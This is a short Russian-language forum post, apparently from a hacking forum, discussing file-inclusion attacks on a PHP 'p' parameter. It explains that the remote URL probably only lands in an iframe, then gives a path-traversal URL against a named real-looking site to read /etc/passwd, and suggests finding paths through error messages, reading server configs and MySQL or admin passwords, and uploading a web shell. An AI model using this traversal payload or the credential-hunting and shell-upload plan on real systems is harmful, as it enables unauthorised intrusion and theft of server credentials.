rip86
http://сайт/index.php?p=http://шелл.txt - это видимо просто фрейм или чтто типо того ..
инклуд шелла, происходит если в скрипте было бы прописано include($_GET['p']); или нечто подобное ..
а тут чтото вроде echo '<iframe src="'.$_GET['p'].'"></iframe>';
---------
http://www.pep.spb.org/index.php?p=../../../../../../../../../../../../../etc/passwd
ну конечно смотря какие права есть .. но можно найти пути по ошибкам, потом поискать конфы сервера, пассы от мускуля/админок чтоб шелл залить ..